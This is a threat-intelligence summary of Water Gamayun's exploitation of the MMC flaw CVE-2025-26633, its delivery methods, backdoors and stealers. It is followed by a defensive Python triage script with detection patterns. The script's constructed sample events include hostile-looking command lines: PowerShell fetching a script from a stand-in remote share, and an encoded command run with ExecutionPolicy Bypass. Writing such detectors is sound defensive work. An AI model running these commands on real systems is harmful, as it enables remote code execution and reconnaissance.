A Russian-linked hacking group known as Water Gamayun (also tracked as EncryptHub and LARVA-208) is actively exploiting a Windows vulnerability identified as CVE-2025-26633. This flaw, found in the Microsoft Management Console (MMC), is being used to execute malicious .msc files and deploy various types of malware.
The attackers are using malicious provisioning packages (.ppkg), signed Windows Installer files (.msi), and .msc console files to distribute backdoors and information stealers. The malware is often disguised as legitimate applications such as DingTalk, QQTalk, and VooV Meeting. These installers trigger PowerShell scripts that download and run follow-up payloads.
Two newly identified PowerShell-based backdoors, SilentPrism and DarkWisp, are used for remote access, command execution, system reconnaissance, data theft, and maintaining persistence. Communication with the command-and-control server is maintained via TCP port 8080, with commands delivered in a base64-encoded format.
In some attacks, a loader named MSC EvilTwin is used to exploit the CVE-2025-26633 vulnerability and drop additional malware such as Rhadamanthys Stealer and StealC. The attackers also deploy custom PowerShell-based stealer variants derived from the open-source Kematian Stealer, capable of collecting sensitive information including browser data, Wi-Fi credentials, session data, and cryptocurrency wallet recovery phrases.
One version of the stealer uses a technique involving the IntelliJ runnerw.exe process to execute remote PowerShell scripts, showcasing a living-off-the-land approach. The group has also been observed distributing malware like Lumma Stealer, Amadey, and various clipboard hijackers.
Analysis of the group’s infrastructure shows it is also used to deploy remote access tools like AnyDesk and execute base64-encoded commands sent from their servers. Their use of legitimate-looking signed installers and multiple delivery methods demonstrates a focus on persistence and stealth in their operations.
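As an added example (not code from the report or from any vendor tooling), the following Python triage runs over constructed process-creation events and flags the behaviours described above: runnerw.exe spawning PowerShell, mmc.exe opening a .msc console file from outside System32, and base64-encoded PowerShell commands, which it decodes so an analyst can read them. All paths, users and command lines are constructed, and the regexes and the "outside System32" rule are assumptions of this example rather than published detection logic.

```python
from __future__ import annotations
import base64
import ntpath
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    parent_image: str   # image path of the parent process
    image: str          # image path of the created process
    command_line: str

# Any abbreviation of -EncodedCommand (-e, -ec, -enc, ...) followed by a base64 blob.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})(?=\s|$)")
MSC_PATH_RE = re.compile(r'(?i)"?([A-Z]:\\[^"]*?\.msc)"?')  # a .msc path, optionally quoted
SYSTEM32_RE = re.compile(r"(?i)^[a-z]:\\windows\\system32\\")

def decode_b64_command(blob: str) -> str | None:
    """PowerShell -EncodedCommand is UTF-16LE; fall back to UTF-8 for other base64 command blobs."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    for encoding in ("utf-16le", "utf-8"):
        text = raw.decode(encoding, errors="replace")
        if "\ufffd" not in text and all(c.isprintable() or c in "\r\n\t" for c in text):
            return text
    return None

def triage(events: list[ProcessEvent]) -> list[tuple[int, str]]:
    """Return (event index, reason) for process events matching the tradecraft described above."""
    findings = []
    for idx, ev in enumerate(events):
        parent, image = (ntpath.basename(p).lower() for p in (ev.parent_image, ev.image))
        if parent == "runnerw.exe" and image == "powershell.exe":
            findings.append((idx, "IntelliJ runnerw.exe spawning PowerShell (LOLBin proxy execution)"))
        if image == "mmc.exe" and (m := MSC_PATH_RE.search(ev.command_line)) and not SYSTEM32_RE.match(m.group(1)):
            findings.append((idx, f"mmc.exe opening a console file outside System32: {m.group(1)}"))
        if image == "powershell.exe" and (m := ENCODED_RE.search(ev.command_line)):
            findings.append((idx, f"PowerShell encoded command decodes to: {decode_b64_command(m.group(1))!r}"))
    return findings

# Constructed sample telemetry for illustration only; hosts, users, paths and commands are invented.
ENCODED_WHOAMI = base64.b64encode("whoami /all".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\JetBrains\IntelliJ IDEA\bin\runnerw.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell.exe -NoProfile -File \\example.invalid\share\stage.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mmc.exe", r'mmc.exe "C:\Users\alice\AppData\Local\Temp\update.msc"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mmc.exe", r"mmc.exe C:\Windows\System32\eventvwr.msc"),  # benign stock console
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", f"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {ENCODED_WHOAMI}"),
]
```

Running `triage(SAMPLE_EVENTS)` flags the runnerw.exe, Temp-folder .msc and encoded-command events while leaving the stock eventvwr.msc launch alone; the same three checks map directly onto Sysmon or EDR process-creation fields.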